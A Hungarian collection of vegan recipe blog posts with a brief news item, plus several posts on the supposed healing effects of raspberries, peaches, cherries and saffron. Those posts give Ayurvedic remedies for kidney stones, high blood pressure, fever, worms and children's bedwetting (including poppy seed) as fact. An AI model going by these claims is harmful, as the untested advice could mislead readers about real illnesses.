A quinoát vastag szűrőn keresztül átmossuk, majd annyi tejben, ami jól ellepi, puhára főzzük. Ha elfőtt róla az összes tej, még adhatunk hozzá. Ha édesen szeretnénk, édesíthetjük banánnal. A gyümölcsszemeket a tetejére helyezzük az egész és/vagy lapokra vágott mandulával. Nem hozzákeverjük, hogy a málna ne törjön össze.
Gyümölcssaláta cukkinivel
2016. július 20. Éltető ételek
Gondoltátok volna, hogy ebben a gyümölcssalátában a rizs helyett cukkini van? Bizony. Mivel semleges az íze, így édes és sós ételekbe is elrejthető, remek töltőanyag lesz belőle. Szóval, ebben ez a gyümölcsrizs, csak nevében rizs, és még csak tej sincs benne. Na de akkor hogyan is készült? Mindjárt írom is a receptet. :) Viszont még annyit fontos megemlítenem, hogy bármilyen gyümölccsel készítheted, ami éppen van otthon vagy elérhető. Augusztusban biztos fogok friss áfonyát is beletenni, tavasszal pedig epret. A krém ízlés szerint kesudióból is készülhet. Hozzávalók: - 1 közepes cukkini - 3-4 sárgabarack - 1 alma - 1/2 banán - kis marék aszalt mazsola és áfonya vegyesen Krém: - 1 marék áztatott mandula (barna héjától megfosztva) - 1 evőkanál méz vagy juharszirup - késhegynyi vaníliapor - 4-5 csepp narancsolaj - kevéske friss citromlé - csipet só Elkészítése: - A cukkinit hámozd meg, és késes darárálóval vágd morzsalékosra. Vigyázz, hogy nehogy pép legyen belőle. - A gyümölcsöket vágd fel kis kockára. - A krémhez a hozzávalókat alaposan turmixold össze. - Csak fogyasztás előtt öntsd a krémet a gyümölcsökre.
Nyári vegán quiche
A vegán quiche gluténmentes receptjét a CsendesM bisztró ajánlja nektek ebben a tikkasztó nyári melegben.
A vegán quiche minden évszakban tökéletes étel. Lehet gyors, egyszerű; lehet csinos, vendégvárós; vagy lehet szülinapi torta a nem édesszájúaknak. Nekünk nagy kedvencünk, különösen ez a gluténmentes verziója.
Íme egy igazán nyárias megoldás!
Vegán quiche hozzávalók:
A tésztához:
150 g dió
70 g mandula / kesudió
50 g napraforgómag
30 g lenmag
100 g aszalt paradicsom pár percre meleg vízbe áztatva (ez kicserélhető 70 g magozott olívabogyóra is, úgy is isteni a végeredmény )
A töltelékhez:
1 kisebb fej vöröshagyma
1-2 szál újhagyma (csak a színe kedvéért )
2 db tv paprika
3 db érett paradicsom
olívaolaj, só, bors
100 g csicseriborsó liszt
4 dl víz
1 tk kala namak (indiai feketesó - ettől a kénes sótól lesz tojásos hatású a massza)
Vegán quiche elkészítése:
A vegán quiche “tortalapjához” tedd be a magokat magokat egy aprítógépbe és daráld őket nagyon finomra. Ha nagyobb darabok is maradnak benne, nehezebb lesz dolgozni vele. Miután a magokat jó apróra daráltad, öntsd hozzá az apróra vágott aszalt paradicsomot és addig dolgoztasd a konyhagépet, amíg egy formálható masszát nem kapsz. (Minél kisebb darabokra vágod annál könnyebben bánik el vele a gép. ) A magos keveréket jó erősen, egyenletesen nyomkodd bele egy sütőpapírral bélelt piteforma aljába, majd tedd félre, míg elkészül a töltelék.
A töltelékhez való zöldségeket aprítsd fel minél apróbb darabokra. A hagymákat kis olívaolajon pirítsd meg, majd jöhet a paprika, a só. Hagyd 5 percig fedő alatt párolódni. Eztán jöhet a paradicsom, kóstolás után ismét sózás, borsozás ízlés szerint. Fedő alatt 15-20 perc alatt készül el a töltelék alapja, mely ha sok levet ereszt, akkor az utolsó 5 percre vedd le a fedőt. Közben egy tálban kézi habverővel keverd csomómentesre a csicserilisztet, a sót és a vizet. A kész lecsóra öntsd rá a masszát és lassú tűzön kevergesd, amíg el nem kezd sűrűsödni.
A tölteléket öntsd rá az alapra, simítsd el és 180 fokra előmelegített sütőben süsd 20-25 percig. Akkor van kész a pite, ha a töltelék már viszonylag szilárd benne. Vigyázz, hogy ne süsd túl, mert akkor kiszárad nagyon a quiche.
Eddigre már isteni illatok terjengenek majd a konyhában, de sajnos meg kell várni, míg kihűl, mert akkor lesz könnyen szeletelhető.
Jó étvágyat hozzá!
A CsendesM vegán bisztró csapatától szeretettel.
A málna jótékony hatásai és ájurvédikus alkalmazása
2016. július 9. Élj harmóniában
A málna egy olyan apró bogyós gyümölcs, amely nagyon sok jótékony hatással rendelkezik. Nagyon sok vitamint, ásványi anyagot tartalmaz (B1, B2, kálium, kálcium, magnézium, vas) és erősíti az immunrendszert. Nagyon jó vértisztító és vérszegénység esetén is jótékony a rendszeres fogyasztása. Kedvezően hat a vérnyomásra és a vércukor szintjére is. Kedvezően hat az emésztésre, segít helyreállítani a bélflóra egyensúlyát. A málna levelei is értékesek. A málna tea antibakteriális, így jó felfázásnál, húgyúti panaszoknál, megfázásnál. Az ájurvédában édes, enyhén savanyú, enyhén fanyar és hűsítő hatásúnak minősül. Stimulálja a vata-t és megnyugtatja a kapha-t. Pittáknak csak mérsékelten alkalmazható. Az ájurvéda egyszerre legfeljebb két marék málna elfogyasztását javasolja, különben elképzelhető hányinger vagy hányás. Soha nem fogyaszd együtt tejjel, joghurttal vagy sajttal, mert így bőrbetegséget akár fekélyeket is okozhat. Néhány ájurvédikus alkalmazási mód: Égető vizelet esetén, fogyassz el 20 szem málnát egy teáskanál kandiscukorral és igyál hozzá egy csésze vizet. Ez segít csökkenteni a gyulladást a húgyutakban és megszüntetni az égető érzést. Ínyvérzésnél , vagy erőteljes menstruációnál üres gyomorra fogyassz el 10 vagy 20 szem málnát, kétszer vagy háromszor a nap során. Vérzési rendellenességekre igyál egy csésze málnalevelet, amihez adj hozzá egy csipet őrölt római köményt és egy csipet édesköményt. Ez a keverék segít csillapítani a vérzést. Vegyszermentes (bio) málnát fogyassz és vedd figyelembe, hogy nem lehet sokáig tárolni.
Mogyorós-körtés pite (vegán)
Egy dolog biztos nagyon jó Magyarországban. A rengeteg gyümölcs és zöldség, ami nyáron terem. Most van idénye a nyári körtéknek is. Tavaly ilyen körtéből főztem lekvárt. A körte mogyoróval jó kis párosítás. Ősszel és télen gyakran vettem körtét (akkor már nem nyári körtét, hanem pl. Alexander vagy Vilmos), szívesen fogyasztottam reggelire natúr mogyorókrémmel. Míg a banán nutellával, a körte mogyorókrémmel, mogyoróval jól harmonizál. Megér egy próbát ez a körtés pite, főleg, ha sok körte terem a kertben.
A recept
Hozzávalók:
- 20 dkg zabpehely
- 30 dkg körte (nyári körtét használtam)
- kb. 2 ek édesítőszer nyírfacukor, gyümölcscukor, ki mit használ (édesszájuaknak több kell bele)
- sótlan pirított mogyoró
- 2 ek folyékony kókuszzsír
- víz/növényi tej
- sütőpapír
Elkészítés:
A körtéket felkoczkázzuk, a zabpehellyel átkeverjük, öntünk rá egy kevés vizet vagy növényi tejet, adunk hozzá kókuszzsírt is, majd a végén édesítjük. Jó alaposan átkeverjük, sűrűbb masszát kell kapjunk. Egy tortaformát kibélelünk sütőpapírral, belesimítjuk a nyers tésztát, megszórjuk durvára őrölt mogyoróval majd egyenletes hőfokon kb. 20-30 perc alatt készre sütjük. Magában is nagyon finom, de a szeleteket akár egy kevés sziruppal (pl. Agave) is meglocsolhatjuk.
Ettől a turmixtól pörögni fogsz egész nap – csak két összetevőből
Ezt a smoothie-t ihatod kávé helyett is, a gyömbér élénkítő hatását biztos megérzed! Ráadásul megfázás és fejfájás ellen is használ. Íze édes, de kicsit csípős. Próbáld ki! Turmixolj össze 3 szép, zöld almát egy diónyi méretű gyömbérdarabbal, és kb. egy deci vízzel. The post Ettől a turmixtól pörögni fogsz egész nap – csak két összetevőből appeared first on VegaNinja.
Karfiol pakora, sült édesburgonya, párolt mangetout és roppanós bébikukorica (gluténmentes, laktózmentes, tojásmentes, vegán)
karfiol pakora, sült édesburgonya, párolt mangetout és roppanós bébikukorica (mindenmentes, vegán) A történet úgy kezdődött, hogy akciós volt az édesburgonya és a karfiol is. Mivel mindkettőt szeretjük, bekerültek a bevásárló kosárba. Itthon aztán elkezdtem figyelni magamat, hogy milyen ízre vágyom, milyen formában kívánnám a karfiolt és az édesburgonyát. Őszintén "magamba néztem" és rájöttem, hogy már sokféleképpen próbálkoztam az édesburgonyával, de igazán a tetszésemet a maga egyszerűségében nyerte el. Hasábokra vágva és sütőben megsütve, ahogyan azt már korábban a diósült receptnél megmutattam nektek itt a Zöld Avocado vegetáriánus gasztroblogon. ;-) Most is így fog elkészülni! (Gondoltam magamban...miközben magamba néztem. :-D Bárcsak ne lennék ennyire vizális típus. Ez a kép nagyon morbid!) Mivel az édesburgonya puha és krémes lesz, kéne mellé valami kemény és rágható, mert nekem az mindig fontos minden ételben... hogy legyen mit rágni. Ekkor már tudtam is a választ: rántott karfiol édesburgonyával a holnapi ebéd! Találtam még a hűtőben párolnivaló zöldségeket is. Kevesebb, mint egy óra alatt pedig elkészült ez a szép, színes menü az édes és sós ízek kedvelőinek. karfiol pakora, sült édesburgonya, párolt mangetout és roppanós bébikukorica (mindenmentes, vegán) Nem volt kedvem órákat tölteni a karfiolrózsák panírozásával ezért a Hémangi főzőiskolájában tanult, indiai verziót választottam. A pakora készítést én csak "lusta panírnak" nevezem. Nincs szükségünk tonnaszám tányérokra az előkészületekhez és nem kell a bundázáshoz egyenként beleforgatnunk a zöldségeket a panírba. A pakora lényege, hogy egy sűrű palacsintatészta szerű masszát készítünk csicseriborsólisztből, beledobáljuk a tetszés szerinti zöldségeket, majd forró olajban pár perc alatt kisütjük őket. Egyre többen választják egészségügyi okokból, etikai okokból vagy szabad akaratból a teljesen növényi alapú táplálkozást. Mivel az indiaiak nagy része nem fogyaszt tojást (vallási okokból) ezért a pakora a vegán étkezők számára is nagyszerű lehetőségeket rejt. A bundázni kívánt zöldségeket tetszés szerint variálhatjuk és a pakora ízesítését is változtathatjuk kedvünk szerint. Nálam most egy sós - enyhén római köményes (ettől lett indiai jellegű) bundát kaptak a karfiolrózsák, melynek a csodaszép sárga színéről a kurkuma gondoskodott. Balázs szerint finomabb lett, mint a jól megszokott, hagyományos rántott karfiol. Sajnos a sütögetés ebben az esetben is olaj fröcsögéssel jár, de az előkészületek és az utómosogatás időtartalmát jelentősen lehet csökkenteni ezzel a módszerrel. ;-) Általában a zöldség pakorák mellé édes-fűszeres csatnikat (mártogatós) készítenek. Én úgy éreztem ennél a menünél nincs erre szükség. Az édesburgonya krémes lágysága és édes íze, a fűszeres pakora bunda, a párolt zöld mangetout borsó és a roppanós, nyers, friss bébikukorica tökéletes íz- és állagharmóniát alkottak a szánkban. Semmi sem hiányzott... szerintünk. ;-) karfiol pakora, sült édesburgonya, párolt mangetout és roppanós bébikukorica (mindenmentes, vegán) HOZZÁVALÓK (4 személyre) - 1 kg édesburgonya - 200 g mangetout borsó - 200 g bébikukorica - 1 közepes fej karfiol - 200 g csicseriborsóliszt - sütéshez tetszés szerinti olaj (én repceolajat használtam, de mehet bele kókuszolaj vagy olívaolaj is, ha nem sajnáljuk rá a pénzt) - 1 tk kurkuma, Himalája só, 1 kk szárított chili, 1/2 kk őrölt római kömény - elhagyható - csipet sütőpor karfiol pakora, sült édesburgonya, párolt mangetout és roppanós bébikukorica (mindenmentes, vegán) ELKÉSZÍTÉS A párolni kívánt zöldségeket 5-10 perc alatt párolóedényben készre pároljuk. A bébikukoricát is meg lehet párolni, de én most nyersen ropogtattam az étel mellé. Sokkal frissebb és zamatosabb. (A párolás és a főzés nem ugyanaz a konyhatechnikai eljárás. A párolás során a zöldségek a tápanyagtartalmuk nagyobb részét megőrzik, mint a főzés során. Párolni egészségesebb. Erre a célra kifejlesztett párolóedényt érdemes beszereznünk, ha tudatosan szeretnénk táplálkozni a hétköznapokban. Megkönnyítik az életünk. ;-) ) sült édesburgonya Az édesburgonyát meghámozzuk majd tetszés szerinti méretű hasábokra vágjuk és sütőpapírra helyezzük őket. Előmelegített sütőben, légkeveréses programon, 220 °C-on, kb. 25-30 perc alatt készre sütjük a finom édes hasábokat. A karfiol pakorához a karfiolt rózsáira szedjük, alaposan megmossuk. A "bundához" a csicseriborsólisztet a sóval, fűszerekkel (kurkuma, szárított chili, őrölt római kömény) és opcionálisan a sütőporral elkeverjük, majd annyi vizet adunk hozzá, hogy egy sűrű palacsintatésztát kapjunk. Közben az olajat feltesszük melegedni egy magasfalú edényben. Eldönthetjük, hogy a karfiolt egyenként mártogatjuk a csicserilisztes tésztába, vagy egyszerre többet is beleszórhatunk. (Én ezt a türelmetlenebb verziót választottam.) Ha egyenként mártogatjuk bele őket, akkor kisebb "kabátot" kap majd egy-egy karfiol darabka. Én nem bántam, hogy vastagon bundázott karfiol pakora lett a végeredmény. Amikor már elég forró az olaj, beledobáljuk a csicseris trutyiba mártogatott karfiolokat és a szokásos módon kisütjük őket. Mint a hagyományos rántott karfiolt. Vigyázzunk a forró olajjal! Használjunk fém eszközt a forgatáshoz illetve a kiszedéshez. Amikor már elkezd pirulni a bunda, csepegtessük le, majd szedjük ki egy papírkéztörlővel bélelt tálba az elkészült karfiol pakorákat. Tálaljunk tetszés szerinti mennyiséget és Jó étvágyat a színes menühöz, ami kb. egy óra alatt elkészíthető egyszerűen! karfiol pakora, sült édesburgonya, párolt mangetout és roppanós bébikukorica (mindenmentes, vegán)Táplálkozz, ne csak étkezz! :-) Megjegyzés: A mangetout egy olyan cukorborsó fajta, melyben a borsó szemek igen kicsik és zsengék, a borsó héja is ehető, így az egész borsó hüvelyével együtt fogyasztható. A szó jelentése "Edd meg az egészet". Gyakori alapanyaga az ázsiai wok ételeknek és párolva is nagyon finom. Ha nem találunk a boltban mangetout borsót, használjunk helyette párolt ceruzababot ebben az ételben. Bővebben a borsókról a mindmegette oldalán olvashattok.
Zöldborsó minden mennyiségben
2016. június 23. Dulmina tündérkonyhája
Igen jó termésünk volt idén zöldborsóból, ezért az utóbbi időben szinte minden nap terítékre került valamilyen formában. Most a kedvenceinket szedem csokorba, hogy ne merüljön feledésbe: Paprikásborsó kölessel (köles, zöldborsó, pirospaprika, só, olaj, víz, zöld fűszer - lehet zsenge répával, gyökérrel, karalábéval, újhagymával tarkítani) Zöldborsós barna rizs (barna rizs, olaj, só, víz,
Az őszibarack jótékony hatásai és ájurvédikus alkalmazás
2016. június 23. Élj harmóniában
Az őszibarack növény rokona egyéb csonthéjasoknak ( mandulának, kajszibaracknak és szilvának). A piacokon júniustól szeptember végéig megtalálhatjuk az őszibarack különböző méretű, fazonú, színű fajtáit. Ez a gyümölcs nagyon ízletes, lédús sokaknak nagy kedvence a nyári melegben. Frissen fogyasztva a legfinomabb és a legegészségesebb:) Vegyszermentes (bio) változatot egyél! Magas vitamin és ásványi anyag tartalma van (leginkább A és C-vitamin, kálium, magnézium) és m agas az antioxidáns tartalma is. Magas a víztartalma is, így segít hidratálni a testet a nagy nyári melegben. Enyhén vízhajtó hatású, ezért tisztítja a veséket, hólyagot. N em csak a víz-háztartásodra van hatással, de segít a vérnyomás szabályozásában is. Könnyen emészthető és tápláló. Erősíti a gyomrot, kiváló emésztési problémáknál . Nyugtatja az idegrendszert és természetes gyulladáscsökkentő Az ájurvédában nehéz vízes, édes, fanyar ízűnek minősül, melegítő energiával hat a testre. Növeli a Pitta-t és csökkenti, megnyugtatja a Vata-t. Ha több mint egy darabot eszel, akkor könnyen növeli a tüdőben a nyálkaképződést , ami növeli a kapha-t. A fűtő energiája miatt a barack, segít a vastagbélben található férgek elpusztításában. Néhány ájurvédikus alkalmazási mód: Férgek ellen, egyél egy vagy két barackot kora reggel üres gyomorra. Rá fél órára igyál egy csésze forró gyömbéritalt 2 teáskanál ricinusolajjal. Utána legalább 3 óráig ne egyél és ne igyál semmit. Ez a kúra segít elpusztítani a vastagbélben található különböző férgeket. Vese- vagy epekő esetén, igyál üres gyomorra egy csésze baracklevet összekeverve 1/2 tk. koriander porral. Ezt naponta kétszer fogyaszd. Epe vagy vesekő esetén ne egyél spenótot, paradicsomot, sót és tamarindot. Amennyiben magas lázad van, égető vizelettel - ezt a magas pitta okozza - igyál egy csésze baracklevelet összekeverve 1/2 tk római köményporral, 1 tk. kandiscukorporral. Székrekedés ellen, egyél 1 órával étkezés után 1 barackot. Ha olyan Vata tüneteid vannak: száraz nyelv, fáradtság, kimerült hang, szívdobogás, remegés olyankor igyál egy csésze baracklevelet egy csipet kősóval, 10 csepp limemal és 1 tk. kandiscukorral. ezt a keveréket naponta 3,4 alkalommal fogyaszthatod a tünetek megszüntetéséhez. Amennyiben izzadékony a kezed és a lábad , étkezéek után 1 órával egyél egy barackot. Magas vérnyomás esetén próbálj ki egy csésze baracklevelet, 1 tk. korianderporral, 1 csipet kardmomporral. ezt a keveréket 2,3 alkalommal fogyaszthatod naponta. Gyerekeknél ágybavizelés ellen, az ájurvéda javasolja, hogy egy csésze baracklevet keverjünk össze 1 csipet őrölt mákkal és naponta egyszer itassuk meg a gyerekkel néhány napon keresztül.
Gluténmentes, cukormentes meggyes muffin
2016. június 20. Élj harmóniában
Gluténmentes, cukormentes meggyes muffin Sokféle muffin receptet tettem fel a blogra már, mert szeretek muffint készíteni. Gyorsan elkészül, egyszerű és isteni finom ízeket lehet kihozni belőle. Ki, ki a saját ízlésének megfelelően tudja készíteni. Meggy szezon lévén mit is készíthettem volna ma reggelire, mint meggyes muffint. Ebből a mennyiségből 6 darab muffint kapsz Hozzávalók 1 csésze hajdinaliszt (púposan) 1 kis zacskó kókuszkrém (rapunzel) 1/2 zacskó sütőpor vanília 1/4 csésze datolyacukor (ha nagyon édesszájú vagy lehet 1/2 csésze is) 1 ek kókuszreszelék 1 púpos ek. kókuszzsír 8 dkg meggy vagy ízlés szerint Vegyszermentes (bio) alapanyagokat használj! Tedd a száraz hozzávalókat egy tálba - hajdinaliszt, datolyacukor, sütőpor, vanília, kókusz - és keverd jól össze. A kókuszkrémet a zacskóból tedd egy kis mérőpohárba és öntsd fel annyi vízzel, hogy majdnem 2 dl legyen. alaposan keverd össze. Majd a száraz hozzávalókhoz keverd hozzá a kókuszzsírt és a kókusztejes folyadékot. Papírral bélelt muffin formába adagold ki és 180 fokra előmelegített sütőben süsd készre. (kb. 25 perc)
Viracocha kehely eperrel
Igen, újra quinoa. (És eper! És csoki! :) De menjünk csak sorjában.) A receptek nagy része egyértelműen sósan használja fel a quinoát, pedig ez is csak olyan alapanyag, mint pl. a rizs. Teljesen semleges az íze, így tényleg bármi lehet belőle, amit szeretnénk. Én a múltkor is édesen készítettem, és nagyon jól bevált. Lássuk, mit tud most az eperrel!
A csoki-eper bevett párosát egy szép adag rumos feketekávéval dobtam fel, és lám, a végeredmény rögtön valami egész más: ha lehet, még sokkal harmonikusabb kombináció. Az étcsoki és a kávé eltérő kesernyéssége, a rum és az eper illatával tényleg bámulatos ízélmény, és még öntet sem kell hozzá, a quinoa golyók olyan puhák és szaftosak magukban, hogy egymás után csúsznak majd le a torkunkon.
Hozzávalók két kehelyhez:
[...] Bővebben!
A cseresznye jótékony hatásai
2016. június 6. Élj harmóniában
A nyár egyik közkedvelt gyümölcse a cseresznye, amelyet már az ókorban gyógyászati célokra is használtak. Ennek oka, hogy számos jótékony hatással rendelkezik. Kedvező hatása van az emésztőszervekre, serkenti az emséztést, felfokozza a belek munkáját, megakadályozza a székrekedést. Erősíti az immunrendszert. Tisztítja a vért, így ízületi gyulladásra is nagy segítséget jelent. Széppé és egészségessé teszi a bőrt. Nagyon magas a vitamin és ásványi anyag tartalma, így hiányállapotok kezeléséhez is alkalmas (kálium, kalcium, foszfor, cink, magnézium és vas, C- és B-vitamin) Kedvezően befolyásolja a hormontermelést. Segít eltávolítani a szervezetből a fölösleges vizet, kiváló vízhajtó hatással rendelkezik A cseresznye rendszeres fogyasztása segít, a szervezet sav-bázis egyensúlyát helyreállítani:) Vegyszermentes (bio) cseresznyét válassz:)
Kolbászokkal támadtak egy vegán étteremre Tbilisziben
Megtámadták Tbiliszi egyik, külföldiek által üzemeltetett vegán kávézóját. A szélsőjobbos támadók kolbászokat vettek elő a vegánok között, majd verekedés tört ki.
Vegán oreós palacsinta eperöntettel
Vegán oreós palacsinta. Ennél egyedibb ízű édességet elképzelni sem tudtam volna gyerekkoromban. Hát még friss eperből turmixolt eperöntettel nyakon öntve!
A palacsinta nekem valamiért örökzöld. Lehet édes, sós, rakott, tekert vagy háromszögbe hajtott, minden formában jöhet. A blogon van vegán rakott palacsinta és vegán brokkolis rakott palacsinta, most pedig házilag elkészített Oreo kekszes krémmel töltött palacsintát készítettem. Több helyről hallottam, hogy van vegán Oreo a boltokban, de én egy ideig ezzel az információval valahogy nem foglalkoztam, mert a reklámok és a csomagolás is arra engedett következtetni, hogy ez nem igaz. Aztán múlt héten feleségem hozott haza többfélét és megnéztem az összetevőket. A klasszikus Oreo valóban vegán a csomagolás szerint, a mogyoróvajas típus viszont már nem az. Mivel éppen palacsintát sütöttem, így nagy örömködésemben azon kezdtem el gondolkodni, hogyan készíthetnék oreóval töltött palacsintát.
Vegán oreós palacsinta eperöntettel, a hozzávalók
Tészta:
1kg liszt
1,5dl kókusz főzőkrém (ez bármi mással helyettesíthető, akár növényi tejjel is)
2 csomag vaníliás cukor
75g nádcukor
20g kókuszzsír
víz
csipet só
Töltelék és öntet:
32db Oreo keksz (nem mindegyik Oreo vegán barát, kérlek nézzétek meg figyelmesen az összetevőket)
1dl sűrű kókusztej (konzerv)
0,75kg friss eper
1 csomag vaníliás cukor
Vegán oreós palacsinta eperöntettel, az elkészítés
A palacsinta tésztát a következőképpen készítsd el. Az 1 kg lisztet keverd össze a két csomag vaníliás cukorral, a sóval és 75 g nádcukorral. A száraz keverékhez add hozzá a 1,5 dl főzőkrémet valamint a 20g felmelegített kókuszzsírt és hígítsd addig vízzel a nyers tésztát, míg kényelmesen meríthetővé nem válik. A Oreo kekszeket és az 1 dl kókusztejet tedd egy turmixgépbe és turmixold kenhető állagúvá. Amikor ezzel megvagy tedd félre a masszát.
Vegyél elő egy alacsony falú tálat és kend ki vékonyan az oreós masszával. Kókuszzsírral kenj ki egy palacsintasütőt majd állj neki a palacsintasütésnek. Minden palacsintát kenj meg vastagon a kenhető állagú oreós krémmel, majd helyezd a tálba egymás mellé. Amikor egy réteggel megvagy, vastag réteg Oreós krémmel kend meg a palacsintákat. Készíts még egy réteget az oeróval töltött palacsintákból, majd az új réteget is kend be egy réteg oreós krémmel.
Mikor a fentiekkel készen vagy turmixold össze nagyon kevés vízzel és az 1 csomag vaníliás cukorral az epret majd a turmixgépből öntsd a palacsinta tetejére a pép egy részét. Hagyd 1-2 órát állni a vegán oreós palacsintát, majd vágj egy szeletet, öntsd le az eperpép maradékának egy részével. Kedves egészségedre!
Különleges konzervkenyér
Különleges a mérete és az íze miatt is. Mérete meglehetősen nagy, hiszen a sütőforma egy óriás-konzervdoboz volt, amiben előtte magozott fekete olívabogyók voltak. Készült is bőven olívás recept a korábbiakban (itt, itt, és itt olvasható), s még nem is írtam le mindegyiket. Nagyságának köszönhetően közel 2 kilós kenyér lett belőle. Emellett íze is különleges, a tészta egyik részébe őrölt fűszerpaprikát szórtam/gyúrtam, így készült el.
A recept
Hozzávalók:
- 3,5 dkg friss élesztő
- 4,5 dl meleg víz
- 30 dkg teljes kiőrlésű liszt
- 45 dkg fehér liszt (BL-55)
- 10 dkg őrölt zabpehely
- 2-3 evőkanál olaj
- 1,4 dkg só
- piros fűszerpaprika (opcionális)
- kókuszzsír
Elkészítés:
Fogunk egy nagyobb tálat, az élesztőt belemorzsoljuk és felöntjük a kézmeleg vízzel. Várunk míg feloldódik az élesztő a vízben. Hozzászórjuk a liszteket, az őrölt zabpelyhet, a sót, s végül az olajat. Kezünkkel átgyúrjuk, átdagasztjuk. Ha úgy látjuk, hogy túlságosan ragacsos a tészta, folyton a kezünkhöz ragad, kevés lisztet szórunk rá. Ha viszont kemény, nehezen gyúrható a tészta, akkor kevés vízzel lazítjuk. Amikor úgy átdagasztottuk, hogy a tészta elválik az edény falától, akkor az edény alját, oldalát megszórjuk kevés liszttel, beletesszük a tésztát, a tetejére egy kevés lisztet szórunk és konyharuhával letakarva meleg helyen kb. 30 percet kelesztjük. Amikor kb. a duplájára kelt, egy részt leszakítunk belőle, amihez hozzászórjuk a paprikát, s újra átdagasztjuk vele, míg szép piros színe lesz a nyers tésztának.
A kimosott konzervet belülről kikenjük kókuszzsírral, megszórjuk kevés liszttel. A piros és fehér tésztát egymás mellé belehelyezzük a konzervbe, majd ismét letakarva kelesztjük, végül sütőbe tesszük, megsütjük kb. 30-40 perc alatt. Nagy mérete miatt a konzervből kiszedve tepsibe állítottam és még sütöttem rajta 5-10 percet, hogy a héja ropogósabb legyen.
Kiszedésnél egy nagy késsel óvatosan körbejártam a konzerv falát, (fa)deszkára borítottam, majd egyszerűen kicsi ütögetésre kihuppant a kenyér. Miután visszatettük így a sütőbe, hogy a héja ropogósabb, szikkadtabb legyen, a sütés után jobb megvárni míg kihűl. Férjem a munkahelyére ebből készült szendvicseket vitt. Nézték, hogy milyen különleges félkör (ha a szeleteket félbevágjuk) és nagy kör alakú szendvicsei vannak.
Ha nincs otthon ilyen nagy konzervünk, illetve nem tudnánk megenni ennyi babot/olívabogyót, nem probléma, kisebb konzervekkel is dolgozhatunk. Erről már írtam korábban: Rusztikus kalózkenyér vagy ha gluténmentesen szeretnénk: gluténmentes kalózkenyér.
Ne felejtsük el, hogy egy ilyen kenyér szépen becsomagolva akár gasztro-ajándék is lehet.
Nyers epres “sajttorta” (vegán)
2016. május 27. Zizi kalandjai
Ennek a nyers tortának a receptjét tavaly “raktam össze” a Food Revoltion Day alkalmából tartott örömfőzésre (láthattok is abban a bejegyzésben már két fotót a tortáról). Persze egészben nem lett a torta lefotózva, így gondoltam, hogy a receptjének megosztásával várok addig, amíg lesz egy normális, természetes fényviszonyok között készült képem róla. Hát egy év telt el mire ez megtörtént!
Múlt vasárnap a Pipacs Pékség Biodiverzitás napot rendezett… volt tészta gyúrás, formázás, pizzasütés kicsikkel és nagyokkal, falatozás, saláta, süti, limonádé, gyümölcsök, labda után rohangálás, jó hangulat, zene, kuncogás. Jó emberek egy helyen, gasztronómia, fiatalok tanítása, ezek mind-mind ugyanúgy beleillenek a food revolution tematikájába… akár ennek szellemében is folyhattak az események.
Ezen alkalomra készítettem el újra Ádi segítségével a nyers epres tortát, amely igen nagy sikert aratott a vendégek körében. Ádi élvezte, hogy segíthetett, meg persze nem maradhatott el a kóstolás sem, mindig ő ellenőrizte, hogy elég édes-e, elég finom-e a torta. Minden egyes kóstolás után megjegyezte: “Húúú, de finooom!”
Tényleg az. És villámgyorsan elkészül. Mindent bedobálunk a késes robotgépbe, aztán belenyomkodjuk/beleöntjük a “tésztát”, “krémet” a kapcsos formába, irány a mélyhűtő és már készen is van. Mi pénteken csináltuk meg a tortát, vasárnap indulás előtt vettük ki a mélyhűtőből. Kb. egy óra kellett, amíg szeletelhető állapotra olvadt. Lime-mal, vaníliával fűszereztük, zöld kivivel díszítettük, mert ez jól passzol a rózsaszín krémhez. Igazi rózsaszín csajos torta. Persze az íze a fiúkat is lenyűgözte!
Marci és Ádám bemutatják a tészta osztást és formázást…
Köszi Linda és Levi a türelmet!
Huncutkák!
Nyers epres ,,sajttorta (vegán)
Hozzávalók 5-6 főre (18 cm-es kapcsos formához):
Torta alaphoz:
– 155 g mandula
– 165 g friss datolya, kimagozva (aszalt is jó, csak érdemes használat előtt egy fél órára langyos vízbe beáztatni, hogy könnyebben aprítsa a robotgép)
– 2 teáskanál kókuszolaj
– 1/2 teáskanál Himalaya só
Krémhez:
– 285 g kesudió, beáztatva legalább 4-5 órára
– 170 g friss (vagy fagyasztott) eper, megtisztítva
– 100 ml juharszirup vagy rizsszirup vagy agavészirup
– 80 ml kókuszolaj
– 2 db lime reszelt héja és frissen facsart leve
– 1 db vaníliarúd kikapart magjai
– 1 db kivi, meghámozva, díszítéshez (opcionális)
A mandulát, a datolyát, a két teáskanál kókuszolajat és a sót tegyük konyhai robotgépbe és aprítsuk kis darabosra (utána a robotgép tálját mossuk el). Akkor jó, ha kiveszünk belőle egy kis mennyiséget és összegyúrva összeragad. Egy kapcsos tortaformát teljesen béleljünk ki folpackkal és nyomkodjuk az aljába a datolyás alapot (eléggé ragad a datolya miatt). Tegyük hűtőbe.
A krém elkészítéséhez szűrjük le a vizet a kesudióról. Tegyük a kesudiót a kifacsart lime levével és héjával a robotgépbe és kezdjük el pürésíteni. Szép lassan adagoljuk hozzá a juharszirupot, a kókuszolajat és a vaníliát is. Ha már jó krémes állagú, akkor adjuk hozzá az epret és ezzel együtt is pürésítjük. Öntsük az alapra az epres krémet és tegyük a fagyasztóba néhány órára, amíg megszilárdul, szeletelhetővé válik, de nem túl kemény.
Tipp : hámozzunk meg egy kivit, vágjuk vékony szeletekre, majd a szeleteket félbe és tegyük (tapasszuk) a kapcsos forma oldalához az alapra. Az epres réteget így tegyük bele.
A sáfrány hatásai
2016. május 24. Élj harmóniában
A sáfrány nem olcsó, de fantasztikus gyógynövény és fűszer, amely minden szövetre hat, de leginkább a vérre fejti ki hatását.Szinte újjáéleszti a vért és a keringést is. Vértisztító, nagyon erőteljes afrodiziákum, befolyásolja a női reproduktív szerveket, idegrendszert, fiatalító, serkentő hatá sú és hatással van az emésztésre is, görcsoldó és szálhajtó szerként is használható. Használható menstruációs fájdalmak enyhítésére és szabálytalan menstruációnál. Továbbá menopauza idej én is. Jó impotencinál, meddőségnél. Ájurvéda javasolja vérszegénységnél. Kedvezően hat derékfájásnál, lumbágónál, reumánál. Javítja az anyagcserét, fokozza az emésztést. Kiváló a más és epe problémákra, pl. m ájmegnagyobbodásnál is ajánlja az ájurvéda. Fűszerként ételekhez adva, segíti a tápanyagok beépülését. A légzőszreveknél köhögés és asztma esetén javasolt az adagolása. Idegi gyengeség, hisztéri és depresszió esetén is javasolt a fogyasztása. Katalizálja számos gyógynövény erősítő hatását.Adható tejhez és shatavarihoz is többek között. Szattvikus gyógynövény, segíti a szeretet és a harmónia kialakulását bennünk. 